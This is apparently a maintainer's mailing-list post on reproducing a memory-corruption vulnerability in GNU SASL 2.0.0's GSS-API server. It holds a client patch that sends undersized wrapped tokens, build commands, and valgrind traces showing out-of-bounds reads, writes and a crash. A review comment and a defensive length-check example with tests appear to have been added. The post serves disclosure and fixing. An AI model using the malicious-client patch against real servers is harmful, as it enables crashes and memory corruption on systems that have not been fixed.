help-gsasl

Reproducing GSS-API server vulnerability


From: Simon Josefsson
Subject: Reproducing GSS-API server vulnerability
Date: Fri, 15 Jul 2022 20:27:49 +0200
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)

If anyone is interested in reproducing the problem, it should be a matter
of the following (using the vulnerable version 2.0.0 as an example):

./configure  --with-gssapi-impl=mit
wget -O examples/smtp-server.c https://gitlab.com/gsasl/gsasl/-/raw/v2.0.1/examples/smtp-server.c
make
./libtool --mode=execute valgrind examples/smtp-server &

Setting up GSS-API including a KDC is the complicated part, but use
inspiration from CI/CD rules [1].

Then patch the GSS-API client code like this, to create a malicious
client:

--- gsasl-2.0.0.orig/lib/gssapi/client.c        2022-06-18 22:56:43.000000000 
+0200
+++ gsasl-2.0.0/lib/gssapi/client.c     2022-07-15 20:18:07.623425188 +0200
@@ -225,6 +225,7 @@
        memcpy (q + 4, p, strlen (p));
       }
 
+      bufdesc.length = 0;
       maj_stat = gss_wrap (&min_stat, state->context, 0, GSS_C_QOP_DEFAULT,
                           &bufdesc, &conf_state, &bufdesc2);
       free (bufdesc.value);
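Review bot: setting bufdesc.length = 0 right after the memcpy at the top of the hunk makes gss_wrap seal a token shorter than the 4-byte header plus authzid that the preceding lines build, and the server in _gsasl_gssapi_server_step assumes that header is always there: the valgrind traces below show it reading byte 0 of a 0-byte unwrapped block at server.c:228 and, with length 3, evidently handing a wrapped-around length - 4 to gsasl_property_set_raw at server.c:235 (malloc of size 0 at property.c:223 followed by a runaway memcpy). The defensive fix belongs in the server right after gss_unwrap at server.c:208: reject any unwrapped token whose length is below 4 before touching its contents.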

Then invoke

make
src/gsasl -m GSSAPI smtp.gsasl.example 2000 --smtp

You will get a nice valgrind output like this:

==719087== Invalid read of size 1
==719087==    at 0x485DE9D: _gsasl_gssapi_server_step (server.c:228)
==719087==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087==    by 0x109880: server_auth (smtp-server.c:120)
==719087==    by 0x109880: smtp (smtp-server.c:196)
==719087==    by 0x109880: main (smtp-server.c:322)
==719087==  Address 0x4cd4a20 is 0 bytes after a block of size 0 alloc'd
==719087==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==719087==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==719087==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==719087==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==719087==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==719087==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==719087==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==719087==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==719087==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087==    by 0x109880: server_auth (smtp-server.c:120)
==719087==    by 0x109880: smtp (smtp-server.c:196)
==719087==    by 0x109880: main (smtp-server.c:322)

Using 'bufdesc.length = 3;' you trigger a more interesting output:

==715913== Invalid read of size 2
==715913==    at 0x483CEE0: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcbe4 is 1 bytes after a block of size 3 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== Invalid write of size 2
==715913==    at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcc30 is 0 bytes after a block of size 0 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x484BD35: gsasl_property_set_raw (property.c:223)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== Invalid read of size 2
==715913==    at 0x483CEEF: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcbe8 is 5 bytes after a block of size 3 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== 
==715913== Process terminating with default action of signal 11 (SIGSEGV)
==715913==  Bad permissions for mapped region at address 0x5054000
==715913==    at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)

Continuing downhill from here is left as an exercise for the reader...

/Simon

[1] https://gitlab.com/gsasl/gsasl/-/blob/v2.0.1/.gitlab-ci.yml#L413
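From a defender's view, the server-side fix for what the traces above show is a length check before the unwrapped token is interpreted. The following is an added example, not code from gsasl or from Simon's post; it assumes the 4-byte header followed by the authzid that the patched client builds, and the function names and return codes are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration, not gsasl's own code. Assumed layout, matching the
   4-byte header + authzid the patched client builds: byte 0 = flags, 1..3 = max size. */
enum { TOKEN_OK = 0, TOKEN_TOO_SHORT = -1, TOKEN_NO_MEMORY = -2 };

/* The server-side arithmetic with no guard: for length < 4 it wraps, so
   malloc (len + 1) turns into malloc (0) when length is 3. */
size_t unchecked_authzid_len (size_t length)
{
  return length - 4;
}

/* Hardened parse: reject anything shorter than the header before reading
   tok[0] or computing length - 4. Caller frees *authzid_out on TOKEN_OK. */
int parse_gssapi_token (const unsigned char *tok, size_t length,
                        unsigned char *layer_out, char **authzid_out)
{
  if (length < 4)
    return TOKEN_TOO_SHORT;
  size_t alen = length - 4;
  char *authzid = malloc (alen + 1);
  if (authzid == NULL)
    return TOKEN_NO_MEMORY;
  memcpy (authzid, tok + 4, alen);
  authzid[alen] = '\0';
  *layer_out = tok[0];
  *authzid_out = authzid;
  return TOKEN_OK;
}

/* Constructed inputs mirroring the post: 0-byte and 3-byte tokens. */
int short_tokens_rejected (void)
{
  unsigned char three[3] = { 1, 0, 0 }, layer; char *a = NULL;
  return parse_gssapi_token (three, 0, &layer, &a) == TOKEN_TOO_SHORT
    && parse_gssapi_token (three, 3, &layer, &a) == TOKEN_TOO_SHORT && !a;
}
/* Constructed well-formed token: flags 1, max size 0xffff, authzid "user". */
int good_token_parses (void)
{
  unsigned char good[] = { 1, 0x00, 0xff, 0xff, 'u', 's', 'e', 'r' }, layer = 0;
  char *a = NULL;
  int ok = parse_gssapi_token (good, sizeof good, &layer, &a) == TOKEN_OK
    && layer == 1 && a != NULL && strcmp (a, "user") == 0;
  free (a);
  return ok;
}
```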
